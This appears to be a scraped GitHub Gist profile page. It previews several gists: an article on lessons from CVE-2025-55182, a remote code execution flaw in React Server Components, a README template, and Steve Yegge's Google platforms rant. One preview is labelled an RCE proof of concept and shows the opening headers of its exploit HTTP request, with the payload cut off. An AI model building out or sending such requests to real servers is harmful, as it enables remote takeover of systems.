Skip to content

Instantly share code, notes, and snippets.

View Nyumat's full-sized avatar
:octocat:
O(n!)

Nyumat

:octocat:
O(n!)
160 followers · 29 following
  • githubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursitegithubfixyoursi
View GitHub Profile
@12joan
12joan / user-keys-considered-harmful.md
Last active December 6, 2025 11:19
User-controlled Keys Considered Harmful - Two Important Takeaways from CVE-2025-55182

User-controlled Keys Considered Harmful

Two important takeaways from CVE-2025-55182

We now have a public POC for CVE-2025-55182, the React Server vulnerability that allows remote code execution on affected servers. The details of how the exploit works are fascinating, and they highlight a couple of important but obscure facts about JavaScript itself that all JS developers should be aware of so that we hopefully don't make the same mistakes in our own code.

It's important to be aware that client-side code can also be affected (XSS) in addition to server-side code (RCE).

1. Promises are overloaded

@maple3142
maple3142 / CVE-2025-55182.http
Last active December 6, 2025 11:14
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@PurpleBooth
PurpleBooth / README-Template.md
Last active December 3, 2025 00:19
A template to make good README.md

Project Title

One Paragraph of project description goes here

Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.

Prerequisites

@chitchcock
chitchcock / 20111011_SteveYeggeGooglePlatformRant.md
Created October 12, 2011 15:53
Stevey's Google Platforms Rant

Stevey's Google Platforms Rant

I was at Amazon for about six and a half years, and now I've been at Google for that long. One thing that struck me immediately about the two companies -- an impression that has been reinforced almost daily -- is that Amazon does everything wrong, and Google does everything right. Sure, it's a sweeping generalization, but a surprisingly accurate one. It's pretty crazy. There are probably a hundred or even two hundred different ways you can compare the two companies, and Google is superior in all but three of them, if I recall correctly. I actually did a spreadsheet at one point but Legal wouldn't let me show it to anyone, even though recruiting loved it.

I mean, just to give you a very brief taste: Amazon's recruiting process is fundamentally flawed by having teams hire for themselves, so their hiring bar is incredibly inconsistent across teams, despite various efforts they've made to level it out. And their operations are a mess; they don't real